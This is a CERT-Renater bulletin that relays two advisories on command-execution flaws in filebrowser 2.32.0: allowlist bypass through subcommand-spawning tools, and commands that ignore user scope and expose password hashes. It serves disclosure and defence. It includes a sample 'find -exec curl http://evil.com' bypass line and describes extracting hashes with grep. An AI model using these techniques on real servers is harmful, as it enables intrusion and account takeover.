Ce mail provient de l'extérieur, restons vigilants ===================================================================== CERT-Renater Note d'Information No. 2025/VULN403 _____________________________________________________________________ DATE : 27/06/2025 HARDWARE PLATFORM(S): / OPERATING SYSTEM(S): Systems running filebrowser (Go) version 2.32.0. ===================================================================== https://github.com/filebrowser/filebrowser/security/advisories/GHSA-3q2w-42mv-cph4 https://github.com/filebrowser/filebrowser/security/advisories/GHSA-hc8f-m8g5-8362 _____________________________________________________________________ Shell Commands Can Spawn Other Commands High hacdias published GHSA-3q2w-42mv-cph4 Jun 26, 2025 Package github.com/filebrowser/filebrowser (Go) Affected versions 2.32.0 Patched versions None Description Summary The Command Execution feature of File Browser only allows the execution of shell command which have been predefined on a user-specific allowlist. Many tools allow the execution of arbitrary different commands, rendering this limitation void. Impact The concrete impact depends on the commands being granted to the attacker, but the large number of standard commands allowing the execution of subcommands makes it likely that every user having the Execute commands permissions can exploit this vulnerability. Everyone who can exploit it will have full code execution rights with the uid of the server process. Vulnerability Description Many Linux commands allow the execution of arbitrary different commands. For example, if a user is authorized to run only the find command and nothing else, this restriction can be circumvented by using the -exec flag. Some common commands having the ability to launch external commands and which are included in the official container image of Filebrowser are listed below. The website https://gtfobins.github.io gives a comprehensive overview: https://gtfobins.github.io/gtfobins/cpio https://gtfobins.github.io/gtfobins/find https://gtfobins.github.io/gtfobins/sed https://gtfobins.github.io/gtfobins/git https://gtfobins.github.io/gtfobins/env As a prerequisite, an attacker needs an account with the Execute Commands permission and some permitted commands. Proof of Concept The following screenshot demonstrates, how this can be used to issue a network call to an external server: image Recommended Countermeasures Until this issue is fixed, we recommend to completely disable Execute commands for all accounts. Since the command execution is an inherently dangerous feature that is not used by all deployments, it should be possible to completely disable it in the application's configuration. The prlimit command can be used to prevent the execution of subcommands: $ find . -exec curl http://evil.com {} \; [...] $ prlimit --nproc=0 find . -exec curl http://evil.com {} \; find: cannot fork: Resource temporarily unavailable It should be prepended to any command executed in the context of the application. prlimit can be used for containerized deployments as well as for bare-metal ones. WARNING: Note that this does prevent any unexpected behavior from the authorized command. For example, the find command can also delete files directly via its -delete flag. As a defense-in-depth measure, Filebrowser should provide an additional container image based on a distroless base image. Timeline 2025-06-25 A patch version has been pushed to disable the feature for all existent installations, and making it opt-in. A warning has been added to the documentation and is printed on the console if the feature is enabled. Due to the project being in maintenance-only mode, the bug has not been fixed. Fix is tracked on #5199. 2025-03-26 Identified the vulnerability in version 2.32.0 References prlimit "Distroless" Container Images. Credits Mathias Tausig (SBA Research) Severity High 8.1/ 10 CVSS v3 base metrics Attack vector Network Attack complexity High Privileges required High User interaction None Scope Changed Confidentiality High Integrity High Availability High CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H CVE ID CVE-2025-52903 Weaknesses No CWEs Credits @mtausig mtausig Reporter @hacdias hacdias Analyst _____________________________________________________________________ Command Execution not Limited to Scope High hacdias published GHSA-hc8f-m8g5-8362 Jun 26, 2025 Package github.com/filebrowser/filebrowser (Go) Affected versions 2.32.0 Patched versions None Description Summary In the web application, all users have a scope assigned, and they only have access to the files within that scope. The Command Execution feature of Filebrowser allows the execution of shell commands which are not restricted to the scope, potentially giving an attacker read and write access to all files managed by the server. Impact Shell commands are executed with the uid of the server process without any further restrictions. This means, that they will have access to at least all files managed by the application from all scopes, even those the user does not have access to in the GUI. the Filebrowser database file containing the password hashes of all accounts. The concrete impact depends on the commands being granted to the attacker, but due to other vulnerabilities identified ("Bypass Command Execution Allowlist", "Shell Commands Can Spawn Other Commands", "Insecure File Permissions") it is likely, that full read- and write-access will exist. Read access to the database means, that the attacker is capable of extracting all user password hashes. This enables an offline dictionary attack on the passwords of all accounts, though the choice of the password hash function (bcrypt with a complexity of 10) gives a strong protection against such attacks. Write access to the database means that attackers are capable of changing a user's password hash, allowing them to impersonate any user account, including an administrator. Vulnerability Description Shell commands executed by a user are created as a simple subprocess of the application without any further restrictions. That means, that they have full access to files accessible by the application. The scope that is assigned to every account is not considered. As a prerequisite, an attacker needs an account with the Execute Commands permission and some permitted commands. Proof of Concept Any exploit highly depends on the commands granted to the attacker. The following screenshot shows, how all password hashes can be extracted using only the grep command: image Recommended Countermeasures Until this issue is fixed, we recommend to completely disable Execute commands for all accounts. Since the command execution is an inherently dangerous feature that is not used by all deployments, it should be possible to completely disable it in the application's configuration. As a defense-in-depth measure, organizations not requiring command execution should operate the Filebrowser from a distroless container image. There are two approaches to fixing this issue: Limiting the process when it is started e.g., by using user namespaces with a tool like Bubblewrap. If this path is chosen, it is important to use a method that works both on a bare-metal server and within an unprivileged container. Re-architecting the command execution feature so that file in the various scopes have a distinct uid as an owner and all shell command are executed under the uid of the user's scope. Timeline 2025-06-25 A patch version has been pushed to disable the feature for all existent installations, and making it opt-in. A warning has been added to the documentation and is printed on the console if the feature is enabled. Due to the project being in maintenance-only mode, the bug has not been fixed. Fix is tracked on #5199. 2025-03-26 Identified the vulnerability in version 2.32.0 2025-04-11 Contacted the project 2025-04-18 Vulnerability disclosed to the project References Sandboxing Applications with Bubblewrap: Securing a Basic Shell "Distroless" Container Images. Credits Mathias Tausig (SBA Research) Severity High 8.1/ 10 CVSS v3 base metrics Attack vector Network Attack complexity High Privileges required High User interaction None Scope Changed Confidentiality High Integrity High Availability High CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H CVE ID CVE-2025-52904 Weaknesses No CWEs Credits @mtausig mtausig Reporter @hacdias hacdias Analyst ========================================================= + CERT-RENATER | tel : 01-53-94-20-44 + + 23/25 Rue Daviel | fax : 01-53-94-20-41 + + 75013 Paris | email:cert@support.renater.fr + =========================================================